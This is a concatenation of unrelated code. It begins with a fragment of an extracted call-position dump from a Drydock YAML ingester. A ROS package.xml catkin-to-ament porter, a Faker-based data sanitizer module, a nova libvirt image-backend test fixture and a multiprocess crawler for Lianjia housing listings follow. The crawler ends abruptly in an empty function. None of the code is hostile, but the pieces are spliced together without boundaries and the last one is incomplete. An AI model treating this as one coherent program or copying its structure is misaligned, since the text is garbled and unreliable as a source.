'objects.HostProfile', ([], {}), '()\n', (16437, 16439), False, 'from drydock_provisioner import objects\n'), ((16864, 16884), 'drydock_provisioner.objects.BootAction', 'objects.BootAction', ([], {}), '()\n', (16882, 16884), False, 'from drydock_provisioner import objects\n'), ((17030, 17059), 'drydock_provisioner.objects.BootActionAssetList', 'objects.BootActionAssetList', ([], {}), '()\n', (17057, 17059), False, 'from drydock_provisioner import objects\n'), ((17668, 17705), 'drydock_provisioner.objects.BootActionAsset', 'objects.BootActionAsset', ([], {}), '(**asset_dict)\n', (17691, 17705), False, 'from drydock_provisioner import objects\n'), ((17954, 17977), 'drydock_provisioner.objects.NodeFilterSet', 'objects.NodeFilterSet', ([], {}), '()\n', (17975, 17977), False, 'from drydock_provisioner import objects\n'), ((18491, 18514), 'drydock_provisioner.objects.BaremetalNode', 'objects.BaremetalNode', ([], {}), '()\n', (18512, 18514), False, 'from drydock_provisioner import objects\n'), ((19001, 19034), 'drydock_provisioner.objects.IpAddressAssignmentList', 'objects.IpAddressAssignmentList', ([], {}), '()\n', (19032, 19034), False, 'from drydock_provisioner import objects\n'), ((20800, 20827), 
'drydock_provisioner.objects.HostInterfaceList', 'objects.HostInterfaceList', ([], {}), '()\n', (20825, 20827), False, 'from drydock_provisioner import objects\n'), ((22977, 23008), 'drydock_provisioner.objects.HostStorageDeviceList', 'objects.HostStorageDeviceList', ([], {}), '()\n', (23006, 23008), False, 'from drydock_provisioner import objects\n'), ((24675, 24704), 'drydock_provisioner.objects.HostVolumeGroupList', 'objects.HostVolumeGroupList', ([], {}), '()\n', (24702, 24704), False, 'from drydock_provisioner import objects\n'), ((25869, 25891), 'os.listdir', 'os.listdir', (['schema_dir'], {}), '(schema_dir)\n', (25879, 25891), False, 'import os\n'), ((26522, 26587), 'pkg_resources.resource_filename', 'pkg_resources.resource_filename', (['"""drydock_provisioner"""', '"""schemas"""'], {}), "('drydock_provisioner', 'schemas')\n", (26553, 26587), False, 'import pkg_resources\n'), ((3023, 3054), 'yaml.safe_load_all', 'yaml.safe_load_all', (['yaml_string'], {}), '(yaml_string)\n', (3041, 3054), False, 'import yaml\n'), ((7377, 7464), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (["('Invalid document - Kind %s and Version %s' % (kind, version))"], {}), "('Invalid document - Kind %s and Version %s' % (kind,\n version))\n", (7397, 7464), True, 'from drydock_provisioner import error as errors\n'), ((9194, 9221), 'drydock_provisioner.objects.NodeTagDefinition', 'objects.NodeTagDefinition', ([], {}), '()\n', (9219, 9221), False, 'from drydock_provisioner import objects\n'), ((10883, 10902), 'drydock_provisioner.objects.TorSwitch', 'objects.TorSwitch', ([], {}), '()\n', (10900, 10902), False, 'from drydock_provisioner import objects\n'), ((15461, 15490), 'drydock_provisioner.objects.HardwareDeviceAlias', 'objects.HardwareDeviceAlias', ([], {}), '()\n', (15488, 15490), False, 'from drydock_provisioner import objects\n'), ((18140, 18164), 'drydock_provisioner.objects.NodeFilter', 'objects.NodeFilter', ([], {}), '(**nf)\n', (18158, 18164), False, 'from drydock_provisioner import objects\n'), ((18859, 18930), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (['"""BaremetalNode needs at least 1 assigned address"""'], {}), "('BaremetalNode needs at least 1 assigned address')\n", (18879, 18930), True, 'from drydock_provisioner import error as errors\n'), ((19089, 19118), 'drydock_provisioner.objects.IpAddressAssignment', 'objects.IpAddressAssignment', ([], {}), '()\n', (19116, 19118), False, 'from drydock_provisioner import objects\n'), ((20893, 20916), 'drydock_provisioner.objects.HostInterface', 'objects.HostInterface', ([], {}), '()\n', (20914, 20916), False, 'from drydock_provisioner import objects\n'), ((23066, 23099), 'drydock_provisioner.objects.HostStorageDevice', 'objects.HostStorageDevice', ([], {'name': 'k'}), '(name=k)\n', (23091, 23099), False, 'from drydock_provisioner import objects\n'), ((24817, 24848), 'drydock_provisioner.objects.HostVolumeGroup', 'objects.HostVolumeGroup', ([], {'name': 'k'}), '(name=k)\n', (24840, 24848), False, 'from drydock_provisioner import objects\n'), ((24930, 24954), 'drydock_provisioner.objects.HostVolumeList', 'objects.HostVolumeList', ([], {}), '()\n', (24952, 24954), False, 'from drydock_provisioner import objects\n'), ((25984, 26005), 'yaml.safe_load_all', 'yaml.safe_load_all', (['f'], {}), '(f)\n', (26002, 26005), False, 'import yaml\n'), ((9460, 9568), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (["('Unknown definition_type in tag_definition instance: %s' % t.definition_type)"], {}), "(\n 
'Unknown definition_type in tag_definition instance: %s' % t.\n definition_type)\n", (9480, 9568), True, 'from drydock_provisioner import error as errors\n'), ((25914, 25951), 'os.path.join', 'os.path.join', (['schema_dir', 'schema_file'], {}), '(schema_dir, schema_file)\n', (25926, 25951), False, 'import os\n'), ((3200, 3306), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (["('Error parsing YAML at (l:%s, c:%s): %s' % (mark.line + 1, mark.column + 1,\n err))"], {}), "('Error parsing YAML at (l:%s, c:%s): %s' % (mark.line +\n 1, mark.column + 1, err))\n", (3220, 3306), True, 'from drydock_provisioner import error as errors\n'), ((3384, 3436), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (["('Error parsing YAML: %s' % err)"], {}), "('Error parsing YAML: %s' % err)\n", (3404, 3436), True, 'from drydock_provisioner import error as errors\n'), ((10332, 10363), 'drydock_provisioner.objects.Repository', 'objects.Repository', ([], {'name': 'k'}), '(name=k, **v)\n', (10350, 10363), False, 'from drydock_provisioner import objects\n'), ((23422, 23449), 'drydock_provisioner.objects.HostPartitionList', 'objects.HostPartitionList', ([], {}), '()\n', (23447, 23449), False, 'from drydock_provisioner import objects\n'), ((23534, 23557), 'drydock_provisioner.objects.HostPartition', 'objects.HostPartition', ([], {}), '()\n', (23555, 23557), False, 'from drydock_provisioner import objects\n'), ((3995, 4007), 'yaml.dump', 'yaml.dump', (['d'], {}), '(d)\n', (4004, 4007), False, 'import yaml\n'), ((5637, 5862), 'drydock_provisioner.objects.ValidationMessage', 'objects.ValidationMessage', ([], {'msg': 'msg', 'name': '"""DD000"""', 'error': '(True)', 'level': 'hd_fields.MessageLevels.ERROR', 'docs': '[doc_ref]', 'diagnostic': '"""Exception during document processing - see Drydock Troubleshooting Guide for DD000"""'}), "(msg=msg, name='DD000', error=True, level=\n hd_fields.MessageLevels.ERROR, docs=[doc_ref], diagnostic=\n 'Exception during document processing - see Drydock Troubleshooting Guide for DD000'\n )\n", (5662, 5862), False, 'from drydock_provisioner import objects\n'), ((6386, 6622), 'drydock_provisioner.objects.ValidationMessage', 'objects.ValidationMessage', ([], {'msg': 'msg', 'name': '"""DD000"""', 'error': '(True)', 'level': 'hd_fields.MessageLevels.ERROR', 'docs': '[doc_ref]', 'diagnostic': '"""Unexpected exception during document processing - see Drydock Troubleshooting Guide for DD000"""'}), "(msg=msg, name='DD000', error=True, level=\n hd_fields.MessageLevels.ERROR, docs=[doc_ref], diagnostic=\n 'Unexpected exception during document processing - see Drydock Troubleshooting Guide for DD000'\n )\n", (6411, 6622), False, 'from drydock_provisioner import objects\n'), ((4583, 4850), 'drydock_provisioner.objects.ValidationMessage', 'objects.ValidationMessage', ([], {'msg': "('%s:%s schema validation error: %s' % (doc_kind, doc_version, e))", 'name': '"""DD001"""', 'docs': '[doc_ref]', 'error': '(True)', 'level': 'hd_fields.MessageLevels.ERROR', 'diagnostic': '"""Invalid input file - see Drydock Troubleshooting Guide for DD001"""'}), "(msg='%s:%s schema validation error: %s' % (\n doc_kind, doc_version, e), name='DD001', docs=[doc_ref], error=True,\n level=hd_fields.MessageLevels.ERROR, diagnostic=\n 'Invalid input file - see Drydock Troubleshooting Guide for DD001')\n", (4608, 4850), False, 'from drydock_provisioner import objects\n')] |
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
""" Contains a class and method for porting a package.xml file from catkin to ament"""
import xml.etree.ElementTree as etree
from .constants import CatkinToAmentMigration, PACKAGE_XML_ELEMENT_ORDER
from .utils import get_functions_with
def new_element(tag, text="", tail="\n", attrib=None):
""" Helper function to make creating an element with a text and tail easier """
if not attrib:
attrib = {}
element = etree.Element(tag, attrib=attrib)
element.text = text
element.tail = tail
return element
def tag_order(tag):
""" Returns integer to order tags """
if tag in PACKAGE_XML_ELEMENT_ORDER:
return PACKAGE_XML_ELEMENT_ORDER.index(tag)
return float("inf")
class PackageXMLPorter:
"""A class for porting a package.xml file from catkin to ament"""
@staticmethod
def port(tree, extra_rules=[]):
"""
Ports package.xml from catkin to ament
Arguments:
tree - the xml tree representing the package.xml file (output of etree.parse("package.xml"))
extra_rules - a list of functions to apply to the xml tree
Returns:
The new xml tree
"""
# Pulls out all methods in this class with name starting with "rule"
rules = get_functions_with(criteria=lambda name: name.startswith("rule"),
from_class=PackageXMLPorter)
package_root = tree.getroot()
for rule in rules + extra_rules:
rule(package_root)
# Make sure there's a final newline
package_root.tail = "\n"
# Reorder the elements
package_root[:] = sorted(list(package_root), key=lambda elem: tag_order(elem.tag))
# Correct indentation
PackageXMLPorter.indent_tree(elem=package_root, level=0)
#########################
# RULES #
#########################
@staticmethod
def rule_set_format(package_root):
# ROS 2 supports formats 2,3
package_root.set("format", "3")
@staticmethod
def rule_set_build_tool(package_root):
for elem in package_root.findall("buildtool_depend"):
if elem.text and elem.text.strip() == "catkin":
package_root.remove(elem)
package_root.append(new_element(tag="buildtool_depend", text="ament_cmake"))
@staticmethod
def rule_set_client_library(package_root):
for elem in list(package_root):
if elem.text and elem.text.strip() in CatkinToAmentMigration.CLIENT_CONVERSION:
elem.text = CatkinToAmentMigration.CLIENT_CONVERSION[elem.text.strip()]
@staticmethod
def rule_add_export_build_type(package_root):
build_elem = new_element(tag="build_type", text="ament_cmake", tail="\n ")
export_elem = new_element(tag="export", text="\n ")
export_elem.append(build_elem)
package_root.append(export_elem)
@staticmethod
def rule_set_run_to_exec_depend(package_root):
for elem in package_root.findall("run_depend"):
elem.tag = "exec_depend"
@staticmethod
def rule_set_depend_to_run_exec(package_root):
for elem in package_root.findall("depend"):
elem.tag = "build_depend"
package_root.append(new_element(tag="exec_depend", text=elem.text, attrib=elem.attrib))
@staticmethod
def rule_update_message_gen_dependency(package_root):
message_generation_used = False
for elem in list(package_root):
if elem.text and elem.text == "message_generation" or elem.text == "message_runtime":
package_root.remove(elem)
message_generation_used = True
if message_generation_used:
package_root.append(new_element(tag="buildtool_depend", text="rosidl_default_generators"))
package_root.append(new_element(tag="build_depend", text="builtin_interfaces"))
package_root.append(new_element(tag="exec_depend", text="builtin_interfaces"))
package_root.append(new_element(tag="exec_depend", text="rosidl_default_runtime"))
package_root.append(new_element(tag="member_of_group", text="rosidl_interface_packages"))
#########################
# HELPERS #
#########################
@staticmethod
def indent_tree(elem, level):
if len(elem) > 0: # element has children
if elem.text is None or len(elem.text) == 0:
elem.text = "\n" + (" "*(level+1)) # sets the indent for the children
list(elem)[-1].tail = "\n" + " "*level
for child in list(elem)[:-1]:
child.tail = "\n" + (" "*(level+1))
PackageXMLPorter.indent_tree(elem=child, level=level+1)
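# Illustrative sketch (not part of the original file): `extra_rules` accepts any
# callables that take the package root element, so callers can inject their own
# edits alongside the built-in rules. The dependency name below is an assumption
# chosen purely for demonstration.
def rule_example_add_lint_depend(package_root):
    package_root.append(new_element(tag="test_depend", text="ament_lint_auto"))
    # Usage: PackageXMLPorter.port(tree=tree, extra_rules=[rule_example_add_lint_depend])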
if __name__ == '__main__':
tree = etree.parse("package.xml")
PackageXMLPorter.port(tree=tree)
tree.write("updated_package.xml", encoding="utf-8", xml_declaration=True)
| [
"xml.etree.ElementTree.Element",
"xml.etree.ElementTree.parse"
]
| [((1008, 1041), 'xml.etree.ElementTree.Element', 'etree.Element', (['tag'], {'attrib': 'attrib'}), '(tag, attrib=attrib)\n', (1021, 1041), True, 'import xml.etree.ElementTree as etree\n'), ((5375, 5401), 'xml.etree.ElementTree.parse', 'etree.parse', (['"""package.xml"""'], {}), "('package.xml')\n", (5386, 5401), True, 'import xml.etree.ElementTree as etree\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import random
from random import choice
from string import digits
from faker import Faker
fake = Faker("fi_FI")
def sanitize_address(value):
return fake.address()
def sanitize_address_if_exist(value):
if value:
return sanitize_address(value)
def sanitize_business_id(value):
return fake.pystr_format(string_format="#######-#", letters="0123456789")
def sanitize_business_id_if_exist(value):
if value:
return sanitize_business_id(value)
def sanitize_city(value):
return fake.city()
def sanitize_city_if_exist(value):
if value:
return sanitize_city(value)
def sanitize_company(value):
return fake.company()
def sanitize_company_if_exist(value):
if value:
return sanitize_company(value)
def sanitize_email(value):
return fake.email()
def sanitize_email_if_exist(value):
if value:
return sanitize_email(value)
def sanitize_first_name(value):
return fake.first_name()
def sanitize_first_name_if_exist(value):
if value:
return sanitize_first_name(value)
def sanitize_generate_random_numbers(value):
return "".join([choice(digits) for i in range(random.randint(0, 10))])
def sanitize_generate_random_numbers_if_exist(value):
if value:
return sanitize_generate_random_numbers(value)
def sanitize_last_name(value):
    return fake.last_name()
def sanitize_last_name_if_exist(value):
if value:
return sanitize_last_name(value)
def sanitize_national_identification_number(value):
return fake.pystr_format(string_format="######-####", letters="0123456789")
def sanitize_national_identification_number_if_exist(value):
if value:
return sanitize_national_identification_number(value)
def sanitize_name(value):
return fake.name()
def sanitize_paragraph(value):
return fake.paragraph()
def sanitize_paragraph_if_exist(value):
if value:
return sanitize_paragraph(value)
def sanitize_phone_number(value):
return fake.phone_number()
def sanitize_phone_number_if_exist(value):
if value:
return sanitize_phone_number(value)
def sanitize_postcode(value):
return fake.postcode()
def sanitize_postcode_if_exist(value):
if value:
return sanitize_postcode(value)
def sanitize_url(value):
return fake.url()
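# Illustrative sketch (not part of the original module): each sanitizer takes the
# current value and returns a replacement, so they can be exercised directly.
# The sample inputs below are made up.
if __name__ == "__main__":
    print(sanitize_email("[email protected]"))
    print(sanitize_national_identification_number("010101-123A"))
    print(sanitize_generate_random_numbers_if_exist("12345"))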
| [
"faker.Faker",
"random.choice",
"random.randint"
]
| [((164, 178), 'faker.Faker', 'Faker', (['"""fi_FI"""'], {}), "('fi_FI')\n", (169, 178), False, 'from faker import Faker\n'), ((1202, 1216), 'random.choice', 'choice', (['digits'], {}), '(digits)\n', (1208, 1216), False, 'from random import choice\n'), ((1232, 1253), 'random.randint', 'random.randint', (['(0)', '(10)'], {}), '(0, 10)\n', (1246, 1253), False, 'import random\n')] |
# Copyright 2012 Grid Dynamics
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
import os
import fixtures
import mock
from nova.virt.libvirt import config
from nova.virt.libvirt import driver
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import utils as libvirt_utils
class ImageBackendFixture(fixtures.Fixture):
def __init__(self, got_files=None, imported_files=None, exists=None):
"""This fixture mocks imagebackend.Backend.backend, which is the
only entry point to libvirt.imagebackend from libvirt.driver.
:param got_files: A list of {'filename': path, 'size': size} for every
file which was created.
:param imported_files: A list of (local_filename, remote_filename) for
every invocation of import_file().
:param exists: An optional lambda which takes the disk name as an
argument, and returns True if the disk exists,
False otherwise.
"""
self.got_files = got_files
self.imported_files = imported_files
self.disks = collections.defaultdict(self._mock_disk)
"""A dict of name -> Mock image object. This is a defaultdict,
so tests may access it directly before a disk has been created."""
self._exists = exists
def setUp(self):
super(ImageBackendFixture, self).setUp()
# Mock template functions passed to cache
self.mock_fetch_image = mock.create_autospec(libvirt_utils.fetch_image)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.utils.fetch_image', self.mock_fetch_image))
self.mock_fetch_raw_image = \
mock.create_autospec(libvirt_utils.fetch_raw_image)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.utils.fetch_raw_image',
self.mock_fetch_raw_image))
self.mock_create_ephemeral = \
mock.create_autospec(driver.LibvirtDriver._create_ephemeral)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.driver.LibvirtDriver._create_ephemeral',
self.mock_create_ephemeral))
self.mock_create_swap = \
mock.create_autospec(driver.LibvirtDriver._create_swap)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.driver.LibvirtDriver._create_swap',
self.mock_create_swap))
# Backend.backend creates all Image objects
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.imagebackend.Backend.backend',
self._mock_backend))
@property
def created_disks(self):
"""disks, filtered to contain only disks which were actually created
by calling a relevant method.
"""
# A disk was created iff either cache() or import_file() was called.
return {name: disk for name, disk in self.disks.items()
if any([disk.cache.called, disk.import_file.called])}
def _mock_disk(self):
# This is the generator passed to the disks defaultdict. It returns
# a mocked Image object, but note that the returned object has not
# yet been 'constructed'. We don't know at this stage what arguments
# will be passed to the constructor, so we don't know, eg, its type
# or path.
#
# The reason for this 2 phase construction is to allow tests to
# manipulate mocks for disks before they have been created. eg a
# test can do the following before executing the method under test:
#
# disks['disk'].cache.side_effect = ImageNotFound...
#
# When the 'constructor' (image_init in _mock_backend) later runs,
# it will return the same object we created here, and when the
# caller calls cache() it will raise the requested exception.
disk = mock.create_autospec(imagebackend.Image)
# NOTE(mdbooth): fake_cache and fake_import_file are for compatibility
# with existing tests which test got_files and imported_files. They
# should be removed when they have no remaining users.
disk.cache.side_effect = self._fake_cache
disk.import_file.side_effect = self._fake_import_file
# NOTE(mdbooth): test_virt_drivers assumes libvirt_info has functional
# output
disk.libvirt_info.side_effect = \
functools.partial(self._fake_libvirt_info, disk)
return disk
def _mock_backend(self, backend_self, image_type=None):
# This method mocks Backend.backend, which returns a subclass of Image
# (it returns a class, not an instance). This mocked method doesn't
# return a class; it returns a function which returns a Mock. IOW,
# instead of the getting a QCow2, the caller gets image_init,
# so instead of:
#
# QCow2(instance, disk_name='disk')
#
# the caller effectively does:
#
# image_init(instance, disk_name='disk')
#
# Therefore image_init() must have the same signature as an Image
# subclass constructor, and return a mocked Image object.
#
# The returned mocked Image object has the following additional
# properties which are useful for testing:
#
# * Calls with the same disk_name return the same object from
# self.disks. This means tests can assert on multiple calls for
# the same disk without worrying about whether they were also on
# the same object.
#
# * Mocked objects have an additional image_type attribute set to
# the image_type originally passed to Backend.backend() during
# their construction. Tests can use this to assert that disks were
# created of the expected type.
def image_init(instance=None, disk_name=None, path=None):
# There's nothing special about this path except that it's
# predictable and unique for (instance, disk).
if path is None:
path = os.path.join(
libvirt_utils.get_instance_path(instance), disk_name)
else:
disk_name = os.path.basename(path)
disk = self.disks[disk_name]
# Used directly by callers. These would have been set if called
# the real constructor.
setattr(disk, 'path', path)
setattr(disk, 'is_block_dev', mock.sentinel.is_block_dev)
# Used by tests. Note that image_init is a closure over image_type.
setattr(disk, 'image_type', image_type)
# Used by tests to manipulate which disks exist.
if self._exists is not None:
# We don't just cache the return value here because the
# caller may want, eg, a test where the disk initially does not
# exist and later exists.
disk.exists.side_effect = lambda: self._exists(disk_name)
else:
disk.exists.return_value = True
return disk
# Set the SUPPORTS_CLONE member variable to mimic the Image base
# class.
image_init.SUPPORTS_CLONE = False
# Ditto for the 'is_shared_block_storage' function and
# 'is_file_in_instance_path'
def is_shared_block_storage():
return False
def is_file_in_instance_path():
return False
setattr(image_init, 'is_shared_block_storage', is_shared_block_storage)
setattr(image_init, 'is_file_in_instance_path',
is_file_in_instance_path)
return image_init
def _fake_cache(self, fetch_func, filename, size=None, *args, **kwargs):
# Execute the template function so we can test the arguments it was
# called with.
fetch_func(target=filename, *args, **kwargs)
# For legacy tests which use got_files
if self.got_files is not None:
self.got_files.append({'filename': filename, 'size': size})
def _fake_import_file(self, instance, local_filename, remote_filename):
# For legacy tests which use imported_files
if self.imported_files is not None:
self.imported_files.append((local_filename, remote_filename))
def _fake_libvirt_info(self, mock_disk, disk_info, cache_mode,
extra_specs, hypervisor_version, disk_unit=None):
# For tests in test_virt_drivers which expect libvirt_info to be
# functional
info = config.LibvirtConfigGuestDisk()
info.source_type = 'file'
info.source_device = disk_info['type']
info.target_bus = disk_info['bus']
info.target_dev = disk_info['dev']
info.driver_cache = cache_mode
info.driver_format = 'raw'
info.source_path = mock_disk.path
return info
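# Illustrative usage sketch (not part of the original module; the test and
# driver-call names are assumptions): a libvirt driver test can install the
# fixture, arrange behaviour for a disk before the driver creates it, and
# assert on the created disks afterwards:
#
#   def test_spawn_root_disk(self):
#       fixture = self.useFixture(ImageBackendFixture(exists=lambda name: False))
#       # arrange behaviour before the code under test creates 'disk'
#       fixture.disks['disk'].cache.side_effect = exception.ImageNotFound(image_id='x')
#       ... run the driver code under test ...
#       self.assertIn('disk', fixture.created_disks)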
| [
"fixtures.MonkeyPatch",
"nova.virt.libvirt.config.LibvirtConfigGuestDisk",
"mock.create_autospec",
"functools.partial",
"collections.defaultdict",
"os.path.basename",
"nova.virt.libvirt.utils.get_instance_path"
]
| [((1711, 1751), 'collections.defaultdict', 'collections.defaultdict', (['self._mock_disk'], {}), '(self._mock_disk)\n', (1734, 1751), False, 'import collections\n'), ((2083, 2130), 'mock.create_autospec', 'mock.create_autospec', (['libvirt_utils.fetch_image'], {}), '(libvirt_utils.fetch_image)\n', (2103, 2130), False, 'import mock\n'), ((2303, 2354), 'mock.create_autospec', 'mock.create_autospec', (['libvirt_utils.fetch_raw_image'], {}), '(libvirt_utils.fetch_raw_image)\n', (2323, 2354), False, 'import mock\n'), ((2548, 2608), 'mock.create_autospec', 'mock.create_autospec', (['driver.LibvirtDriver._create_ephemeral'], {}), '(driver.LibvirtDriver._create_ephemeral)\n', (2568, 2608), False, 'import mock\n'), ((2815, 2870), 'mock.create_autospec', 'mock.create_autospec', (['driver.LibvirtDriver._create_swap'], {}), '(driver.LibvirtDriver._create_swap)\n', (2835, 2870), False, 'import mock\n'), ((4492, 4532), 'mock.create_autospec', 'mock.create_autospec', (['imagebackend.Image'], {}), '(imagebackend.Image)\n', (4512, 4532), False, 'import mock\n'), ((5015, 5063), 'functools.partial', 'functools.partial', (['self._fake_libvirt_info', 'disk'], {}), '(self._fake_libvirt_info, disk)\n', (5032, 5063), False, 'import functools\n'), ((9178, 9209), 'nova.virt.libvirt.config.LibvirtConfigGuestDisk', 'config.LibvirtConfigGuestDisk', ([], {}), '()\n', (9207, 9209), False, 'from nova.virt.libvirt import config\n'), ((2155, 2242), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.utils.fetch_image"""', 'self.mock_fetch_image'], {}), "('nova.virt.libvirt.utils.fetch_image', self.\n mock_fetch_image)\n", (2175, 2242), False, 'import fixtures\n'), ((2379, 2474), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.utils.fetch_raw_image"""', 'self.mock_fetch_raw_image'], {}), "('nova.virt.libvirt.utils.fetch_raw_image', self.\n mock_fetch_raw_image)\n", (2399, 2474), False, 'import fixtures\n'), ((2633, 2746), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.driver.LibvirtDriver._create_ephemeral"""', 'self.mock_create_ephemeral'], {}), "('nova.virt.libvirt.driver.LibvirtDriver._create_ephemeral'\n , self.mock_create_ephemeral)\n", (2653, 2746), False, 'import fixtures\n'), ((2895, 2997), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.driver.LibvirtDriver._create_swap"""', 'self.mock_create_swap'], {}), "('nova.virt.libvirt.driver.LibvirtDriver._create_swap',\n self.mock_create_swap)\n", (2915, 2997), False, 'import fixtures\n'), ((3097, 3192), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.imagebackend.Backend.backend"""', 'self._mock_backend'], {}), "('nova.virt.libvirt.imagebackend.Backend.backend', self\n ._mock_backend)\n", (3117, 3192), False, 'import fixtures\n'), ((6835, 6857), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (6851, 6857), False, 'import os\n'), ((6735, 6776), 'nova.virt.libvirt.utils.get_instance_path', 'libvirt_utils.get_instance_path', (['instance'], {}), '(instance)\n', (6766, 6776), True, 'from nova.virt.libvirt import utils as libvirt_utils\n')] |
"""
Version 2: multi-process crawler for second-hand housing listings
1. The crawler is split into a download job and a parse job (it could be split further, but that adds little here); each runs in its own child process and the two communicate through a data pipe
2. The download job does not use a queue internally; task management and communication are done with a task pipe (queues do not work well when a main process, child processes and process pools inside child processes are mixed)
3. The parse job takes data from the pipe shared with the download job, parses it and stores the result
Open question: how should the crawler stop once all targets have been crawled?
"""
import csv
import datetime
import logging
import multiprocessing as mp
import re
import time
from collections import OrderedDict
import requests
from pyquery import PyQuery
from requests import RequestException
base_url = r'https://sh.lianjia.com/ershoufang'
# There is no elegant shared structure for the set of already-processed URLs, so a plain set plus a lock is used so it can be applied in the multi-process setup
seen_urls = set()
lock = mp.Lock()
# Number of retries after a failed download
retries = 3
# Current date
today = datetime.date.today()
# Regular expressions for list-page and detail-page URLs
list_page_pattern = '^{}/(pg\d+/)?$'.format(base_url)
item_page_pattern = '^{}/\d+.html$'.format(base_url)
# Path where the scraped data is stored
csv_file_path = r'../.data/ershoufang-{}.csv'.format(today)
# Logging configuration
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(process)05d - %(levelname)s - %(message)s')
def start_download_job(data_writer, init_tasks):
"""
    Download job
    :param data_writer: data pipe (write end)
    :param init_tasks: initial set of tasks
:return:
"""
    # Build the process pool, sized by CPU count: use 4 when fewer than 4 cores, otherwise the CPU count
    pool_size = mp.cpu_count() > 4 and mp.cpu_count() or 4
    pool = mp.Pool(pool_size)
    # Tasks are managed through a pipe instead of a queue (queues run into all sorts of problems when child processes and process pools are mixed like this)
    (task_reader, task_writer) = mp.Pipe(duplex=False)
    # To keep the code simple, the initial tasks are just sent through the task pipe and received again below
    # This could also be done inside the loop: read from the task pipe only once the initial task set is empty
    task_writer.send(init_tasks)
    # Keep reading task data from the task pipe and processing it
    while True:
        # A task is a set of URLs
        urls = task_reader.recv()
        # Use the process pool to download each URL; the downloaded document and its URL are sent out through the data pipe as a tuple
for url in urls:
            # Skip URLs that have already been processed
            with lock:
                if url in seen_urls:
                    continue
                else:
                    seen_urls.add(url)
            # Run the download task
pool.apply_async(download, (url, task_writer, data_writer))
pool.close()
pool.join()
def download(url, task_writer, data_writer):
"""
    Download a page, retrying up to 3 times
    :param url: URL to download
    :param task_writer: task pipe (write end)
    :param data_writer: data pipe (write end)
:return:
"""
for _ in range(retries + 1):
try:
logging.info('download page {}'.format(url))
content = requests.get(url).text
if content is None:
continue
            # If this is a list page, extract the detail-page links it contains
            if is_list_page(url):
                links = parse_list_page(content, url)
                # Send the detail-page link list out through the task pipe
if links and len(links) > 0:
task_writer.send(links)
else:
data_writer.send((content, url))
            return
except RequestException:
            # Sleep 2 seconds after an exception
            time.sleep(2)
    # Log an error once the retry limit has been exceeded
    logging.error('Download still failing after {} retries: {}'.format(retries, url))
    # Put the failed URL back into the task pipe
task_writer.send(set([url]))
def is_list_page(url):
"""
    Check whether a URL is a list page
:param url:
:return:
"""
return re.match(list_page_pattern, url)
def parse_list_page(content, url):
"""
    Parser for list pages
    :param content:
    :param url:
    :return: set of detail-page links
"""
pq = PyQuery(content, url=url)
return set([li.attr('href') for li in pq('ul.sellListContent div.title > a').items()])
def parse_item_page(content, url):
"""
    Parser for detail pages
    :param content:
    :param url:
    :return: the parsed detail data
"""
pq = PyQuery(content, url=url)
return OrderedDict({'title': pq('div.content > div.title > h1').text().strip(),
'sub_title': pq('div.content > div.title > div.sub').text().strip(),
'price': pq('div.price > span.total').text().strip(),
'unit_price': pq('div.unitPrice > span.unitPriceValue').text().replace('元/平米', '').strip(),
'down_payment_info': pq('div.tax > span.taxtext').text().strip(),
'area': re.search('(\d+\.?\d*)', pq('div.area > div.mainInfo').text()).group(1),
'year_info': pq('div.area > div.subInfo').text().strip(),
'house_type': pq('div.room > div.mainInfo').text().strip(),
'floor': pq('div.room > div.subInfo').text().strip(),
'towards': pq('div.type > div.mainInfo').text().strip(),
'housing_estate': pq('div.communityName > a:first').text().strip(),
'housing_estate_link': pq('div.communityName > a:first').attr('href'),
'location': tuple([i.text().strip() for i in pq('div.areaName > span > a').items()]),
'broker': pq('div.brokerName > a').text().strip(),
'broker_homepage': pq('div.brokerName > a').attr('href'),
'number': pq('div.houseRecord > span.info').text().replace('举报', '').strip()})
def start_parse_job(data_reader):
"""
    Parse job
    :param data_reader: data pipe (read end)
:return:
"""
    # Build the process pool, sized by CPU count: use 4 when fewer than 4 cores, otherwise the CPU count
    pool_size = mp.cpu_count() > 4 and mp.cpu_count() or 4
    # The parse job only uses half the size of the download pool (adjust as needed: its throughput is currently much higher than the download job's, and this also avoids spawning too many processes)
pool = mp.Pool(pool_size // 2)
while True:
args = data_reader.recv()
if args is not None:
pool.apply_async(parse, args, callback=process)
pool.close()
pool.join()
def parse(content, url):
"""
    Parse a page
:param content:
:param url:
:return:
"""
if content is None or url is None:
return
try:
        # Parse the detail page and return the data
return parse_item_page(content, url)
except Exception as e:
logging.error(e)
def process(data):
